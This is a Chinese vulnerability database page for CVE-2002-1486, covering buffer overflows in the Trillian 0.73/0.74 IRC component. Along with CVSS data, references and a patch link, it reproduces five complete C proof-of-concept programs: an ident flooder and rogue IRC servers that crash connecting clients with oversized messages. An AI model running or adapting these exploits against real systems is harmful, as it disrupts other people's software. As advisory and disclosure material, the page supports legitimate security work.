CVE-2002-1486
CVSS7.5
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:43
NMCOES    

[原文]Multiple buffer overflows in the IRC component of Trillian 0.73 and 0.74 allows remote malicious IRC servers to cause a denial of service and possibly execute arbitrary code via (1) a large response from the server, (2) a JOIN with a long channel name, (3) a long "raw 221" message, (4) a PRIVMSG with a long nickname, or (5) a long response from an IDENT server.


[CNNVD]Trillian IRC超大消息块远程缓冲区溢出漏洞(CNNVD-200304-021)

        
        Cerulean Studios Trillian是一个聊天程序,和多种即时通讯程序使用相同的接口,包括AIM、ICQ、Yahoo! Messenger、MSN Messenger和IRC。
        Trillian在接收IRC服务器发送的超大数据存在问题,远程攻击者可以利用这个漏洞对Trillian进行拒绝服务攻击。
        如果Trillian接收到IRC发送的超过4095字节的数据块,就会导致崩溃,产生拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cerulean_studios:trillian:0.725
cpe:/a:cerulean_studios:trillian:0.73
cpe:/a:cerulean_studios:trillian:0.74

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1486
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1486
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-021
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5777
(VENDOR_ADVISORY)  BID  5777
http://archives.neohapsis.com/archives/bugtraq/2002-09/0258.html
(VENDOR_ADVISORY)  BUGTRAQ  20020920 Yet Another. Trillian 'JOIN' Overflow.
http://www.securityfocus.com/bid/5769
(VENDOR_ADVISORY)  BID  5769
http://www.securityfocus.com/bid/5765
(UNKNOWN)  BID  5765
http://www.iss.net/security_center/static/10163.php
(VENDOR_ADVISORY)  XF  trillian-irc-server-bo(10163)
http://www.iss.net/security_center/static/10151.php
(VENDOR_ADVISORY)  XF  trillian-raw221-bo(10151)
http://www.iss.net/security_center/static/10150.php
(UNKNOWN)  XF  trillian-irc-join-bo(10150)
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0139.html
(UNKNOWN)  NTBUGTRAQ  20020914 Trillian .74 and below, ident flaw.
http://archives.neohapsis.com/archives/bugtraq/2002-09/0268.html
(UNKNOWN)  BUGTRAQ  20020922 *sigh* Trillian multiple DoS
http://archives.neohapsis.com/archives/bugtraq/2002-09/0266.html
(UNKNOWN)  BUGTRAQ  20020921 And Again. Trillian 'raw 221' Overflow.
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0140.html
(UNKNOWN)  NTBUGTRAQ  20020919 Trillian .73 & .74 "PRIVMSG" Overflow.

- 漏洞信息

Trillian IRC超大消息块远程缓冲区溢出漏洞
高危 边界条件错误
2003-04-02 00:00:00 2005-10-20 00:00:00
远程  
        
        Cerulean Studios Trillian是一个聊天程序,和多种即时通讯程序使用相同的接口,包括AIM、ICQ、Yahoo! Messenger、MSN Messenger和IRC。
        Trillian在接收IRC服务器发送的超大数据存在问题,远程攻击者可以利用这个漏洞对Trillian进行拒绝服务攻击。
        如果Trillian接收到IRC发送的超过4095字节的数据块,就会导致崩溃,产生拒绝服务攻击。
        

- 公告与补丁

        厂商补丁:
        Cerulean Studios
        ----------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Cerulean Studios Trillian 0.74:
        Cerulean Studios Patch trillian-v0.74-patch-b.exe
        
        http://www.ceruleanstudios.com/trillian-v0.74-patch-b.exe

- 漏洞信息 (21804)

Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability (EDBID:21804)
windows remote
2002-09-18 Verified
0 Lance Fitz-Herbert
N/A [点击下载]
source: http://www.securityfocus.com/bid/5733/info

Trillian ships with an ident server to facilitate connections to IRC servers that require an ident response before allowing access. A buffer overflow condition exists in the Trillian ident server, which may potentially be exploited to cause a denial of service or execute arbitrary code.

When the ident server receives a malformed request that is 418 bytes or more in length, the client crashes and memory is corrupted. It may be possible for an attacker to exploit the resulting memory corruption to execute arbitrary instructions with the privileges of the ident server.

/* Trillian-Ident.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Ident Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5
   This Example Will Just DoS The Trillian Client.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
char payload[500];
int main(int argc, char * argv[]) {
        int iret;
        struct hostent *host;
        SOCKET sockhandle;
        SOCKADDR_IN address;
        WSADATA wsdata;

        if (argc<2) {
                printf("\nTrillian Ident DoS\n");
                printf("----------------------\n");
                printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
                printf("Tested On Version .74 and .73\n\n");
                printf("Usage: trillian-ident <address>");
                return 0;
        }

        WSAStartup(MAKEWORD(1,1),&wsdata);
        printf("Making Socket Now...\n");
        sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

        if (sockhandle == SOCKET_ERROR) {
                printf("Error Creating Socket\n");
                WSACleanup();
                return 1;
        }

        printf("Socket Created\n");

        address.sin_family = AF_INET;
        address.sin_port = htons(113);
        address.sin_addr.s_addr = inet_addr(argv[1]);


        if (address.sin_addr.s_addr == INADDR_NONE) {
                host = NULL;
                printf("Trying To Resolve Host\n");
                host = gethostbyname(argv[1]);
                if (host == NULL) {
                        printf("Uknown Host: %s\n",argv[1]);
                        WSACleanup();
                        return 1;
                }
                memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);
        }



        printf("Connecting To Server...\n");
        iret = connect(sockhandle, (struct sockaddr *) &address,        sizeof(address));

        if (iret == SOCKET_ERROR) {
                printf("Couldnt Connect\n");
                WSACleanup();
                return 1;
        }

        printf("Connected to %s!\nSending Payload\n",argv[1]);
        memset(payload,'A',500);
        send(sockhandle,payload,strlen(payload),0);
        Sleep(100);
        WSACleanup();
        return 0;
}
		

- 漏洞信息 (21810)

Trillian 0.73/0.74 IRC PRIVMSG Buffer Overflow Vulnerability (EDBID:21810)
windows remote
2002-09-19 Verified
0 Lance Fitz-Herbert
N/A [点击下载]
source: http://www.securityfocus.com/bid/5755/info

Trillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems.

A buffer overflow has been discovered in Trillian version .73 and .74. When processing a PRIVMSG command with an overly large sender name, a buffer overflow will occur resulting in memory corruption and a denial of service.

Although not yet confirmed, because memory can be overwritten, it may be possible for arbitrary attacker-supplied code to be executed with the privileges of the client.

/* Trillian-Privmsg.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Privmsg Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:"
#define MSG2 "!ident@address PRIVMSG target :You are the weakest link, 
Goodbye.\n"

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[300];

        printf("\nTrillian Privmsg Flaw\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For 
Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        memset(payload,'A',300);
        send(TempSock,payload,strlen(payload),0);
        send(TempSock,MSG2,strlen(MSG2),0);

        printf("Exiting\n");
        sleep(100);
        WSACleanup();
        return 0;
}
		

- 漏洞信息 (21813)

Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability (EDBID:21813)
windows dos
2002-09-20 Verified
0 Lance Fitz-Herbert
N/A [点击下载]
source: http://www.securityfocus.com/bid/5765/info

The Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.

This issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected. 

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[300];

        printf("\nTrillian Join Flaw\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For
Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        memset(payload,'A',300);
        send(TempSock,payload,strlen(payload),0);
        send(TempSock,"\n",1,0);

        printf("Exiting\n");
        sleep(100);
        WSACleanup();
        return 0;
}
		

- 漏洞信息 (21816)

Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability (EDBID:21816)
windows dos
2002-09-21 Verified
0 Lance Fitz-Herbert
N/A [点击下载]
source: http://www.securityfocus.com/bid/5769/info

Trillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems. 

It has been reported that Trillian does not perform adequate bounds checking when receiving IRC raw user mode messages. When a Trillian client receives an instruction from a server for a raw user mode change containing 251 or more bytes of data, a buffer overflow occurs. This could result in denial of service, or the execution of arbitrary attacker supplied instructions.

/* Trillian-221.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian "Raw 221" Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

   Greets: AnAh, Hooves.
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 221 target "

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[257];

        printf("\nTrillian Raw 221 Flaw\n");
        printf("---------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For 
Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        memset(payload,'A',257);
        send(TempSock,payload,strlen(payload),0);
        send(TempSock,"\n",1,0);

        printf("Exiting\n");
        sleep(100);
        WSACleanup();
        return 0;
}		

- 漏洞信息 (21823)

Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability (EDBID:21823)
windows dos
2002-09-22 Verified
0 Lance Fitz-Herbert
N/A [点击下载]
source: http://www.securityfocus.com/bid/5777/info

A vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes. 

A malicious server may exploit this condition to cause a denial of service in the client. This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.

/* Trillian-Dos.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits Multiple Trillian DoS Flaws:
      Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,
352, 367
      Part Flaw
      Data length flaw.

   Tested On Version .74
   Compiles with Borland 5.5 Commandline Tools.

   These Examples Will Just DoS The Trillian Client,
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define SERVER ":server "
#define PART ":nick!ident@address PART\n"

int main(int argc, char *argv[]) {
		 SOCKET TempSock = SOCKET_ERROR;
		 WSADATA WsaDat;
		 SOCKADDR_IN Sockaddr;
		 int nRet;
		 char payload[4096];
		 if (argc < 2) {
		 		 usage();
		 		 return 1;
		 }
		 if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) &&
(strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
		 		 usage();
		 		 return 1;
		 }

		 printf("Listening on port 6667 for connections....\n");
		 if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        		 printf("ERROR: WSA Initialization failed.");
		 		 return 0;
		 }


		 /* Create Socket */
		 s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
		 if (s == INVALID_SOCKET) {
		 		 printf("ERROR: Could Not Create Socket. Exiting\n");
		 		 WSACleanup();
		 		 return 0;
		 }

		 Sockaddr.sin_port = htons(6667);
		 Sockaddr.sin_family = AF_INET;
		 Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
		 if (nRet == SOCKET_ERROR) {
		 		 printf("ERROR Binding Socket");
		 		 WSACleanup();
		 		 return 0;
		 }

		 /* Make Socket Listen */
		 if (listen(s, 10) == SOCKET_ERROR) {
		 		 printf("ERROR: Couldnt Make Listening Socket\n");
		 		 WSACleanup();
		 		 return 0;
		 }

		 while (TempSock == SOCKET_ERROR) {
		       TempSock = accept(s, NULL, NULL);
		 }

		 printf("Client Connected, Sending Payload\n");


		 if (!strcmp(argv[1],"part")) {
		 		 send(TempSock,PART,strlen(PART),0);
		 }
		 if (!strcmp(argv[1],"raw")) {
		 		 send(TempSock,SERVER,strlen(SERVER),0);
		 		 send(TempSock,argv[2],strlen(argv[2]),0);
		 		 send(TempSock,"\n",1,0);
		 }
		 if (!strcmp(argv[1],"data")) {
		 		 memset(payload,'A',4096);
		 		 send(TempSock,payload,strlen(payload),0);
		 }
		 printf("Exiting\n");
		 sleep(100);
		 WSACleanup();
		 return 0;
}

usage() {
		 		 printf("\nTrillian Multiple DoS Flaws\n");
		 		 printf("---------------------------\n");
		 		 printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
		 		 printf("Tested On Version .74\n\n");
		 		 printf("Usage: Trillian-Dos <type> [num]\n");
		 		 printf("Type: raw, part, data\n");
		 		 printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
333, 352, 367\n\n");
}		

- 漏洞信息

10791
Trillian IRC Plugin Channel Name Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A remote overflow exists in Trillian. Trillian fails to validate IRC channel name s resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2002-08-02 2002-08-01
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Trillian IRC Oversized Data Block Buffer Overflow Vulnerability
Failure to Handle Exceptional Conditions 5777
Yes No
2002-09-22 12:00:00 2009-07-11 05:06:00
Discovery of this vulnerability credited to "Lance Fitz-Herbert" <fitzies@hotmail.com>.

- 受影响的程序版本

Cerulean Studios Trillian 0.74

- 漏洞讨论

A vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes.

A malicious server may exploit this condition to cause a denial of service in the client. This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.

- 漏洞利用

An exploit has been provided by "Lance Fitz-Herbert" &lt;fitzies@hotmail.com&gt;.

- 解决方案

Fixes available:


Cerulean Studios Trillian 0.74

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站